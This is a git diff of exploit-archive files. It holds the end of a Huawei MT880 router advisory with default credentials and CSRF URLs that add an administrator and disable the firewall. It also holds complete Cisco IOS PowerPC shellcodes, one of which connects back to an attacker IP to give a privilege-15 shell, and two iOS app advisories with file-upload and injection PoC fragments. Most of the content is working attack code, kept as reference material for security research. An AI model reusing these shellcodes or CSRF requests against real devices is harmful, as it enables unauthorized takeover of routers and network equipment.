covered in this advisory. - -Cheers -/JA - -# milw0rm.com [2009-08-24] +Description: +Huawei MT880 is a device offered by the algerian telecom operator - +FAWRI, to provide ADSL Internet connexion and it's already widely in use. +Overview: +Huawei MT880 firmware and its default configuration has flaws, which +allows LAN users to gain unauthorized full access to device. + +Here are just limited PoCs. + +Default credentials on the web-based management interface: + +admin/admin + +Possible XSRFs: + +Adding an administrator user: +http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 + + +Disabling firewall/anti-DoS... features: +http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 + + +Adding a MAC address to the whitelist: +http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 + + +Adding an IP address allowed by the firewall: +http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 + + +Over flaws are not covered in this advisory. + +Cheers +/JA + +# milw0rm.com [2009-08-24] diff --git a/platforms/hardware/shellcode/13291.txt b/platforms/hardware/shellcode/13291.txt index 45a77e49b..4d24de1b3 100755 --- a/platforms/hardware/shellcode/13291.txt +++ b/platforms/hardware/shellcode/13291.txt @@ -1,135 +1,135 @@ -# ---------------------------------------------------------------------------------------- -# -# Cisco IOS Connectback shellcode v1.0 -# (c) 2007 IRM Plc -# By Gyan Chawdhary -# -# ---------------------------------------------------------------------------------------- -# -# The code creates a new TTY, allocates a shell with privilege level 15 and connects back -# on port 21 -# -# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. -# -# -# The following five hard-coded addresses must be located for the target IOS version. -# -# The hard-coded addresses used here are for: -# -# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) -# -# ---------------------------------------------------------------------------------------- -.equ malloc, 0x804785CC -.equ allocate_tty, 0x803d155c -.equ ret, 0x804a42e8 -.equ addr, 0x803c4ad8 -.equ str, 0x81e270b4 -.equ tcp_connect, 0x80567568 -.equ tcp_execute_command, 0x8056c354 -.equ login, 0x8359b1f4 -.equ god, 0xff100000 -.equ priv, 0x8359be64 -# ---------------------------------------------------------------------------------------- - -main: - stwu 1,-48(1) - mflr 0 - stw 31,44(1) - stw 0,52(1) - mr 31,1 - li 3,512 - lis 9,malloc@ha #malloc() memory for tcp structure - la 9,malloc@l(9) - mtctr 9 - bctrl - mr 0,3 - stw 0,20(31) - lwz 9,12(31) - li 0,1 - stb 0,0(9) - lwz 9,12(31) - lis 0,0xac1e # connect back ip address - ori 0,0,1018 # - stw 0,4(9) - li 3,66 - li 4,0 - lis 9,allocate_tty@ha # allocate new TTY - la 9,allocate_tty@l(9) - mtctr 9 - bctrl - addi 0,31,24 - - # Fix TTY structure to enable level 15 shell without password - # - # - ########################################################## - - # login patch begin - lis 9, login@ha - la 9, login@l(9) - li 8,0 - stw 8, 0(9) - # login patch end - - #IDA placeholder for con0 - # - # lis %r9, ((stdio+0x10000)@h) - # lwz %r9, stdio@l(%r9) - # lwz %r0, 0xDE4(%r9) #priv struct - # - # priv patch begin - lis 9, priv@ha - la 9, priv@l(9) - lis 8, god@ha - la 8, god@l(8) - stw 8, 0(9) - # priv patch end - - ########################################################### - - li 3,0 - li 4,21 # Port 21 for connectback - lwz 5,12(31) - li 6,0 - li 7,0 - mr 8,0 - li 9,0 - lis 11,tcp_connect@ha # Connect to attacker IP - la 11,tcp_connect@l(11) - mtctr 11 - bctrl - mr 0,3 - stw 0,20(31) - li 3,66 - lwz 4,20(31) - li 5,0 - li 6,0 - li 7,0 - li 8,0 - li 9,0 - li 10,0 - lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash - la 11,tcp_execute_command@l(11) - mtctr 11 - bctrl - lwz 11,0(1) - lwz 0,4(11) - mtlr 0 - lwz 31,-4(11) - mr 1,11 - - ########################################### - lis 9, addr@ha - addi 0, 9, addr@l - mtctr 0 - xor 3,3,3 - addi 3,0, -2 - lis 10, str@ha - addi 4, 10, str@l - bctrl - lis 10, ret@ha - addi 4, 10, ret@l - mtctr 4 - bctrl - +# ---------------------------------------------------------------------------------------- +# +# Cisco IOS Connectback shellcode v1.0 +# (c) 2007 IRM Plc +# By Gyan Chawdhary +# +# ---------------------------------------------------------------------------------------- +# +# The code creates a new TTY, allocates a shell with privilege level 15 and connects back +# on port 21 +# +# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. +# +# +# The following five hard-coded addresses must be located for the target IOS version. +# +# The hard-coded addresses used here are for: +# +# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) +# +# ---------------------------------------------------------------------------------------- +.equ malloc, 0x804785CC +.equ allocate_tty, 0x803d155c +.equ ret, 0x804a42e8 +.equ addr, 0x803c4ad8 +.equ str, 0x81e270b4 +.equ tcp_connect, 0x80567568 +.equ tcp_execute_command, 0x8056c354 +.equ login, 0x8359b1f4 +.equ god, 0xff100000 +.equ priv, 0x8359be64 +# ---------------------------------------------------------------------------------------- + +main: + stwu 1,-48(1) + mflr 0 + stw 31,44(1) + stw 0,52(1) + mr 31,1 + li 3,512 + lis 9,malloc@ha #malloc() memory for tcp structure + la 9,malloc@l(9) + mtctr 9 + bctrl + mr 0,3 + stw 0,20(31) + lwz 9,12(31) + li 0,1 + stb 0,0(9) + lwz 9,12(31) + lis 0,0xac1e # connect back ip address + ori 0,0,1018 # + stw 0,4(9) + li 3,66 + li 4,0 + lis 9,allocate_tty@ha # allocate new TTY + la 9,allocate_tty@l(9) + mtctr 9 + bctrl + addi 0,31,24 + + # Fix TTY structure to enable level 15 shell without password + # + # + ########################################################## + + # login patch begin + lis 9, login@ha + la 9, login@l(9) + li 8,0 + stw 8, 0(9) + # login patch end + + #IDA placeholder for con0 + # + # lis %r9, ((stdio+0x10000)@h) + # lwz %r9, stdio@l(%r9) + # lwz %r0, 0xDE4(%r9) #priv struct + # + # priv patch begin + lis 9, priv@ha + la 9, priv@l(9) + lis 8, god@ha + la 8, god@l(8) + stw 8, 0(9) + # priv patch end + + ########################################################### + + li 3,0 + li 4,21 # Port 21 for connectback + lwz 5,12(31) + li 6,0 + li 7,0 + mr 8,0 + li 9,0 + lis 11,tcp_connect@ha # Connect to attacker IP + la 11,tcp_connect@l(11) + mtctr 11 + bctrl + mr 0,3 + stw 0,20(31) + li 3,66 + lwz 4,20(31) + li 5,0 + li 6,0 + li 7,0 + li 8,0 + li 9,0 + li 10,0 + lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash + la 11,tcp_execute_command@l(11) + mtctr 11 + bctrl + lwz 11,0(1) + lwz 0,4(11) + mtlr 0 + lwz 31,-4(11) + mr 1,11 + + ########################################### + lis 9, addr@ha + addi 0, 9, addr@l + mtctr 0 + xor 3,3,3 + addi 3,0, -2 + lis 10, str@ha + addi 4, 10, str@l + bctrl + lis 10, ret@ha + addi 4, 10, ret@l + mtctr 4 + bctrl + # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/platforms/hardware/shellcode/13292.txt b/platforms/hardware/shellcode/13292.txt index 58a1c0971..bcef84336 100755 --- a/platforms/hardware/shellcode/13292.txt +++ b/platforms/hardware/shellcode/13292.txt @@ -1,65 +1,65 @@ -# ---------------------------------------------------------------------------------------- -# -# Cisco IOS Bind shellcode v1.0 -# (c) 2007 IRM Plc -# By Varun Uppal -# -# ---------------------------------------------------------------------------------------- -# -# The code creates a new VTY, allocates a password then sets the privilege level to 15 -# -# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. -# Once assembled, the payload is only 116 bytes in length -# -# The following four hard-coded addresses must be located for the target IOS version. -# Version 1.1 of the shellcode will auto-locate these values and make the code -# IOS-version-independent -# -# The hard-coded addresses used here are for: -# -# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) -# -# ---------------------------------------------------------------------------------------- -.equ makenewvty, 0x803d0d08 -.equ malloc, 0x804785cc -.equ setpwonline, 0x803b9e90 -.equ linesstruct, 0x82f9e334 -# ---------------------------------------------------------------------------------------- - -.equ priv, 0xf1000000 #value used to set the privilege level - -main: li 3,71 #new vty line = 71 - lis 9,makenewvty@ha - la 9,makenewvty@l(9) - mtctr 9 - bctrl #makenewvty() - - li 3,0x1e5c - lis 9,malloc@ha - la 9,malloc@l(9) - mtctr 9 - bctrl #malloc() memory for structure - - li 4,70 - stw 4,0xa68(3) - li 5,72 - stw 5,0xa6c(3) - li 4,0x00 - bl setp #pointer to the password into LR - -.string "1rmp455" #the password for the line - -setp: mflr 5 - lis 9,setpwonline@ha - la 9,setpwonline@l(9) - mtctr 9 - bctrl #setpwonline() - - lis 8,linesstruct@ha - la 8,linesstruct@l(8) - lwz 9,0(8) - lis 7,priv@ha - la 7,priv@l(7) - stw 7,0xde4(9) #set privilege level to 15 - +# ---------------------------------------------------------------------------------------- +# +# Cisco IOS Bind shellcode v1.0 +# (c) 2007 IRM Plc +# By Varun Uppal +# +# ---------------------------------------------------------------------------------------- +# +# The code creates a new VTY, allocates a password then sets the privilege level to 15 +# +# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. +# Once assembled, the payload is only 116 bytes in length +# +# The following four hard-coded addresses must be located for the target IOS version. +# Version 1.1 of the shellcode will auto-locate these values and make the code +# IOS-version-independent +# +# The hard-coded addresses used here are for: +# +# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) +# +# ---------------------------------------------------------------------------------------- +.equ makenewvty, 0x803d0d08 +.equ malloc, 0x804785cc +.equ setpwonline, 0x803b9e90 +.equ linesstruct, 0x82f9e334 +# ---------------------------------------------------------------------------------------- + +.equ priv, 0xf1000000 #value used to set the privilege level + +main: li 3,71 #new vty line = 71 + lis 9,makenewvty@ha + la 9,makenewvty@l(9) + mtctr 9 + bctrl #makenewvty() + + li 3,0x1e5c + lis 9,malloc@ha + la 9,malloc@l(9) + mtctr 9 + bctrl #malloc() memory for structure + + li 4,70 + stw 4,0xa68(3) + li 5,72 + stw 5,0xa6c(3) + li 4,0x00 + bl setp #pointer to the password into LR + +.string "1rmp455" #the password for the line + +setp: mflr 5 + lis 9,setpwonline@ha + la 9,setpwonline@l(9) + mtctr 9 + bctrl #setpwonline() + + lis 8,linesstruct@ha + la 8,linesstruct@l(8) + lwz 9,0(8) + lis 7,priv@ha + la 7,priv@l(7) + stw 7,0xde4(9) #set privilege level to 15 + # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/platforms/hardware/shellcode/13293.txt b/platforms/hardware/shellcode/13293.txt index 56f745947..8aeae851a 100755 --- a/platforms/hardware/shellcode/13293.txt +++ b/platforms/hardware/shellcode/13293.txt @@ -1,50 +1,50 @@ -# ---------------------------------------------------------------------------------------- -# -# Cisco IOS Tiny shellcode v1.0 -# (c) 2007 IRM Plc -# By Gyan Chawdhary -# -# ---------------------------------------------------------------------------------------- -# -# The code creates a new TTY, and sets the privilege level to 15 without a password -# -# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. -# -# -# The following two hard-coded addresses must be located for the target IOS version. -# -# The hard-coded addresses used here are for: -# -# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) -# -# ---------------------------------------------------------------------------------------- -.equ ret, 0x804a42e8 -.equ login, 0x8359b1f4 -.equ god, 0xff100000 -.equ priv, 0x8359be64 -# ---------------------------------------------------------------------------------------- - -main: - - # login patch begin - lis 9, login@ha - la 9, login@l(9) - li 8,0 - stw 8, 0(9) - # login patch end - - # priv patch begin - lis 9, priv@ha - la 9, priv@l(9) - lis 8, god@ha - la 8, god@l(8) - stw 8, 0(9) - # priv patch end - - # exit code - lis 10, ret@ha - addi 4, 10, ret@l - mtctr 4 - bctrl - +# ---------------------------------------------------------------------------------------- +# +# Cisco IOS Tiny shellcode v1.0 +# (c) 2007 IRM Plc +# By Gyan Chawdhary +# +# ---------------------------------------------------------------------------------------- +# +# The code creates a new TTY, and sets the privilege level to 15 without a password +# +# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. +# +# +# The following two hard-coded addresses must be located for the target IOS version. +# +# The hard-coded addresses used here are for: +# +# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) +# +# ---------------------------------------------------------------------------------------- +.equ ret, 0x804a42e8 +.equ login, 0x8359b1f4 +.equ god, 0xff100000 +.equ priv, 0x8359be64 +# ---------------------------------------------------------------------------------------- + +main: + + # login patch begin + lis 9, login@ha + la 9, login@l(9) + li 8,0 + stw 8, 0(9) + # login patch end + + # priv patch begin + lis 9, priv@ha + la 9, priv@l(9) + lis 8, god@ha + la 8, god@l(8) + stw 8, 0(9) + # priv patch end + + # exit code + lis 10, ret@ha + addi 4, 10, ret@l + mtctr 4 + bctrl + # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/platforms/hardware/webapps/30031.txt b/platforms/hardware/webapps/30031.txt new file mode 100755 index 000000000..9cb22bae4 --- /dev/null +++ b/platforms/hardware/webapps/30031.txt @@ -0,0 +1,271 @@ +Document Title: +=============== +Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1160 + + +Release Date: +============= +2013-12-03 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1160 + + +Common Vulnerability Scoring System: +==================================== +8.9 + + +Product & Service Introduction: +=============================== +iFiles is the most intuitive file manager for iOS with features like connectivity to many file cloud services, +transferring files between computer or cloud services, ability to view many file formats (PDF viewer now +supports annotations, search and more), voice recorder, web downloader, text file editor and more. + +Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, Box.net, SkyDrive, SugarSync, AFP +(Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, CloudApp, PogoPlug, WebDav, Amazon +S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and UltiCloud. + +( Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 & http://imagam.com ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Imagam iFiles v1.16.0 mobile application for apple iOS. + + +Vulnerability Disclosure Timeline: +================================== +2013-12-03: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Imagam +Product: iFiles - Mobile Application iOS 1.16.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Critical + + +Technical Details & Description: +================================ +1.1 +A file include- & arbitrary file upload web vulnerability has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS. +An arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access. +A file include web vulnerability allows a remote attacker to unauthorized include local web-server file requests or external file requests. + +The vulnerability is located in the vulnerable file- and folder-name value. Remote attackers can include local file requests combined with script code +to successful exploit the issue. To include to the vulnerable foldername value it is required to manipulate the `create folder` (add) input (POST Method). +The secound possibility to inject is the vulnerable filename value of the misconfigured (POST Method) upload module. After the include the remote attacker +can access the included file by requesting the regular index or sub category folder (web interface) site. + +The arbitrary file upload vulnerability is located in the vulnerable filename value of the upload module. Attackers are also able to upload a php or js +web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension +test.jpg.html.js.php.gif.jpg . After the upload the attacker opens the file in the web application to delete the .gif.jpg file extension to access the +resource with elevated execution access rights. + +Exploitation of the file include & arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] File Upload + +Vulnerable Parameter(s): + [+] filename (value) - (multiple extensions) + [+] foldername + +Affected Module(s): + [+] File & Folder Dir Listing (http://localhost:8080) + + + +1.2 +2 local command/path injection web vulnerabilities has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS. +The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the in the device name value of the file dir und sub category listing module. Local attackers are able to inject +own malicious system specific commands or path values requests as the iOS device name. The execute of the injected script code occurs in two +different section with persistent attack vector. The first section is the wifi app web-interface index file/folder dir listing. The secound +execute occurs in the file/folder sub category listing. The security risk of the local command/path inject vulnerability is estimated as high(-) +with a cvss (common vulnerability scoring system) count of 6.2(+)|(-)6.3. + +Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests. + + +Request Method(s): + [+] POST to GET + +Vulnerable Parameter(s): + [+] devicename + +Affected Module(s): + [+] Index- File Dir Listing + [+] Sub Folder/Category - File Dir Listing + + +Proof of Concept (PoC): +======================= +1.1 +The file include and arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web application +user account and also without user interaction. For security demonstration or to reproduce the vulnerability follow the provided +information and steps below. + +PoC: foldername + +
+ +
+ + + +PoC: filename (value) + + + +* +Mon, 02 Dec 2013 15:50:10 GMT + -- + +x + + + + +* +>"<[FILE INCLUDE WEB VULNERABILITY!]="_device%20folder&path-issue-2_files/a.htm" <="" a=""> + + + +1.2 +The local command inject web vulnerability can be exploited by remote attackers with low privileged or restricted iOS device user account +and no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. + +PoC: devicename + +
+ +
+ + +Solution - Fix & Patch: +======================= +1.1 +The file include vulnerability and arbitrary file upload vulnerability can be patched by a secure parse and encode of the vulnerable +filename and foldername values. +Encode also the vulnerable path sub category file dir listing and the index file dir listing. Recognize the path value. + +1.2 +To patch the local command inject web vulnerability it is required to encode the deviename value in the index and sub category sites +to prevent injects or requests. + + +Security Risk: +============== +1.1 +The security risk of the file include and arbitrary file upload (restricted upload bypass) web vulnerability is estimated as critical. + +1.2 +The security risk of the local command/path inject web vulnerability is estimated as high(-). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/hardware/webapps/30055.txt b/platforms/hardware/webapps/30055.txt new file mode 100755 index 000000000..832d89892 --- /dev/null +++ b/platforms/hardware/webapps/30055.txt @@ -0,0 +1,191 @@ +Document Title: +=============== +Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1152 + + +Release Date: +============= +2013-12-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1152 + + +Common Vulnerability Scoring System: +==================================== +6.7 + + +Product & Service Introduction: +=============================== +Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos +between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless +Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone, +from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your +devices under the same Wi-Fi network. + +(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS. + + +Vulnerability Disclosure Timeline: +================================== +2012-11-30: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Wireless Transfer App COM +Product: Wireless Transfer App 3.7 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS. +The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module. +Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected +command/path request occurs in the album sub category list and the main album name index list. The security risk of the +command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-). + +Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access +and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific +commands or unauthorized path requests. + +Vulnerable Application(s): + [+] Wireless Transfer App v3.7 + +Vulnerable Parameter(s): + [+] album name + [+] photoGallery_head - album + +Affected Module(s): + [+] Index - Album Name List + [+] Sub Category - Title Album Name List + + +Proof of Concept (PoC): +======================= +The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low +user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below. + +Manual steps to exploit the vulnerability ... + +1. Install the wireless transfer v3.7 iOS mobile application +2. Open the default Photo app of your iOS device +3. Include an album with the following payload `">%20` and save it +4. Switch back to the installed wireless transfer app and start the wifi transfer +5. Open the local web-server url http://localhost:6688/ (default link) +6. The local path/command execute occurs in the album name value of the photoGallery_head class +7. Successful reproduce of the vulnerability! + + +PoC: Album Name - photoGallery_head in the Album Sub Category List + +
+ +
logo
+
+
+
Album : ">%20
+
+ +
+
+
+ + +PoC: Album Name - photoalbum in the Album Index List + +
+
+
+
>%20(125)
+
+
Fotoarchiv(0)
+
+
WallpapersHD(3)
+ + +Reference(s): +http://localhost:6688/index.html +http://localhost:6688/albumhtm +http://localhost:6688/albumhtm?id= +http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure encode and parse of the vulnerable album name value. +Parse and filter also the index and sub category output list to ensure it prevents local command/path requests. + + +Security Risk: +============== +The security risk of the local command/path inject web vulnerability is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/hardware/webapps/30056.txt b/platforms/hardware/webapps/30056.txt new file mode 100755 index 000000000..832d89892 --- /dev/null +++ b/platforms/hardware/webapps/30056.txt @@ -0,0 +1,191 @@ +Document Title: +=============== +Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1152 + + +Release Date: +============= +2013-12-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1152 + + +Common Vulnerability Scoring System: +==================================== +6.7 + + +Product & Service Introduction: +=============================== +Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos +between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless +Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone, +from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your +devices under the same Wi-Fi network. + +(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS. + + +Vulnerability Disclosure Timeline: +================================== +2012-11-30: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Wireless Transfer App COM +Product: Wireless Transfer App 3.7 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS. +The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module. +Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected +command/path request occurs in the album sub category list and the main album name index list. The security risk of the +command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-). + +Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access +and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific +commands or unauthorized path requests. + +Vulnerable Application(s): + [+] Wireless Transfer App v3.7 + +Vulnerable Parameter(s): + [+] album name + [+] photoGallery_head - album + +Affected Module(s): + [+] Index - Album Name List + [+] Sub Category - Title Album Name List + + +Proof of Concept (PoC): +======================= +The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low +user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below. + +Manual steps to exploit the vulnerability ... + +1. Install the wireless transfer v3.7 iOS mobile application +2. Open the default Photo app of your iOS device +3. Include an album with the following payload `">%20` and save it +4. Switch back to the installed wireless transfer app and start the wifi transfer +5. Open the local web-server url http://localhost:6688/ (default link) +6. The local path/command execute occurs in the album name value of the photoGallery_head class +7. Successful reproduce of the vulnerability! + + +PoC: Album Name - photoGallery_head in the Album Sub Category List + +
+ +
logo
+
+
+
Album : ">%20
+
+ +
+
+
+ + +PoC: Album Name - photoalbum in the Album Index List + +
+
+
+
>%20(125)
+
+
Fotoarchiv(0)
+
+
WallpapersHD(3)
